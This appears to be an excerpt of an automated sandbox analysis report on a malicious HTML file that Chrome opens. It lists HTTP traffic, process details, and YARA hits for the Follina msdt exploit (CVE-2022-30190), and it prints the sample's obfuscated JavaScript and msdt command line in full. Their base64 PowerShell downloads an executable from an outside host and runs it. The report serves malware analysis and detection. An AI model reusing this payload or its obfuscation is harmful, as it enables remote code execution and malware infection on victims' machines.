                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2022-09-02 13:28:56 UTC | 2 | IN | Data Raw: 32 63 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 32 33 33 33 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                      Data Ascii: 2ca<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5723" elapsed_seconds="23336"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                      2022-09-02 13:28:56 UTC | 2 | IN | Data Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f
                      Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></
                      2022-09-02 13:28:56 UTC | 3 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0



                      Target ID: 0
                      Start time: 15:28:47
                      Start date: 02/09/2022
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                      Imagebase: 0x7ff614650000
                      File size: 2851656 bytes
                      MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      Target ID: 2
                      Start time: 15:28:52
                      Start date: 02/09/2022
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8
                      Imagebase: 0x7ff614650000
                      File size: 2851656 bytes
                      MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      Target ID: 3
                      Start time: 15:28:52
                      Start date: 02/09/2022
                      Path: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html
                      Imagebase: 0x7ff614650000
                      File size: 2851656 bytes
                      MD5 hash: 0FEC2748F363150DC54C1CAFFB1A9408
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: moderate

                      Target ID: 16
                      Start time: 15:29:57
                      Start date: 02/09/2022
                      Path: C:\Windows\System32\msdt.exe
                      Wow64 process (32bit): false
                      Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'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'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22
                      Imagebase: 0x7ff7d5070000
                      File size: 1560576 bytes
                      MD5 hash: 8BE43BAF1F37DA5AB31A53CA1C07EE0C
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.697950028.0000023881AC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698155124.0000023881B59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000010.00000002.698121675.0000023881B50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation: moderate

                      Script:

                      Code
                      location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\"";